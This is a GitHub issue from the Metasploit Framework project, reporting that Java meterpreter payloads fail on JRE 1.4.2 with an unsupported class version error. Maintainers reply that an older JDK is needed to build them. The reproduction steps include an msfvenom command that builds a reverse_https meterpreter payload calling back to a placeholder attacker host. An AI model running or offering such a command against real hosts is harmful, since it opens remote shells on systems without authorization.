### ISSUE TITLE
Java payloads don't run on jre 1.4.2 linux - Unsupported major.minor version 49.0 error

### ISSUE THREAD

**Issue by user843** [rapid7/metasploit-framework#7295]
## Steps to reproduce
1. create a java payload using msfvenom, for example: ./msfvenom -p java/meterpreter/reverse_https LHOST=<IP> LPORT=<PORT> > /tmp/jmr_https
2. copy and run the jar file on a linux host using jre 1.4.2, for example I have an Oracle server on CentOS5: /u01/app/oracle/product/10.2/db_1/jre/1.4.2/bin/java -jar jmr_https
## Expected behavior

The jar file gets executed without any problem.
## Current behavior

Java throws the following error:

Exception in thread "main" java.lang.UnsupportedClassVersionError: metasploit/Payload (Unsupported major.minor version 49.0)
        at java.lang.ClassLoader.defineClass0(Native Method)
        at java.lang.ClassLoader.defineClass(ClassLoader.java:539)
        at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:123)
        at java.net.URLClassLoader.defineClass(URLClassLoader.java:251)
        at java.net.URLClassLoader.access$100(URLClassLoader.java:55)
        at java.net.URLClassLoader$1.run(URLClassLoader.java:194)
        at java.security.AccessController.doPrivileged(Native Method)
        at java.net.URLClassLoader.findClass(URLClassLoader.java:187)
        at java.lang.ClassLoader.loadClass(ClassLoader.java:289)
        at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:274)
        at java.lang.ClassLoader.loadClass(ClassLoader.java:235)
        at java.lang.ClassLoader.loadClassInternal(ClassLoader.java:302)
### Metasploit version

v4.12.23-dev
### I installed Metasploit with:
- [x] Kali package via apt
### OS

Kali Linux 2016.2

**Comment by bcook-r7** [comment]
That means we need to build them with an older JDK. Not sure if the source builds for something that old still, will need to double-check.

**Comment by busterb** [comment]
The instructions for building a custom payload with an older JDK are in the payloads repo here. Thanks. https://github.com/rapid7/metasploit-payloads/tree/master/java
